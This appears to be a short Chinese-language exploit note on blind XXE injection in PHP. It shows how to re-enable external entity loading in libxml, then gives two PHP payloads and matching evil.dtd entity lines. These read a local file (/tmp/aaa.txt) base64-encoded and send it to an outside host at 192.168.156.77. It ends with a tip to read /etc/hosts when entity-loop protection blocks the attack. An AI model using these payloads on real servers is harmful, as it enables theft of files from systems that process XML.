在libxml>=2.9.0以后的版本默认不开启外部实体解析,需要添加参数开启
<?php $xml = <<<EOF <?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt"> <!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd"> %remote; %all; ]> <c>&send;</c> EOF; libxml_disable_entity_loader(false); $data = simplexml_load_string($xml, ‘SimpleXMLElement‘, LIBXML_NOENT);#print_r($data);
<!ENTITY % all "<!ENTITY send SYSTEM ‘http://192.168.156.77/?%file;‘>" >
<?php $xml = <<<EOF <?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt"> <!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd"> %remote; %send; ]> <c></c> EOF; libxml_disable_entity_loader(false); $data = simplexml_load_string($xml, ‘SimpleXMLElement‘, LIBXML_NOENT); #print_r($data);
<!ENTITY % all "<!ENTITY % send SYSTEM ‘http://192.168.156.77/?%file;‘>" >
如果有类似如下报错,尝试换/etc/hosts读取,可能是防止指数放大攻击,对内容长度做了限制。
Detected an entity reference loop in http://192.168.125.133:8081/evil.dtd
